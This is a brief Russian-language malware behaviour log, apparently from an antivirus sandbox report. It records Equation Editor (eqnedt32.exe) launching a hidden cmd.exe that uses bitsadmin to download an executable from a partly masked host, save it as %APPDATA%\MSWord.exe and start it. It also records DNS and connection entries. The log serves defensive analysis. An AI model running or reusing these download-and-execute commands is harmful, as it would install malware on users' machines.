Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer vW /priority foreground http://va##am.in/wp-content/plugins/contact-form-7/admin/includes/fileuae.exe %APPDATA%\MSWord.exe && start %APPDATA%\MSWord.exe
- 'va##am.in':80
- DNS ASK va##am.in
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer vW /priority foreground http://va##am.in/wp-content/plugins/contact-form-7/admin/includes/fileuae.exe %APPDATA%\MSWord.exe && start %APPDATA%\MSWord.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer vW /priority foreground http://va##am.in/wp-content/plugins/contact-form-7/admin/includes/fileuae.exe %APPDATA%\MSWord.exe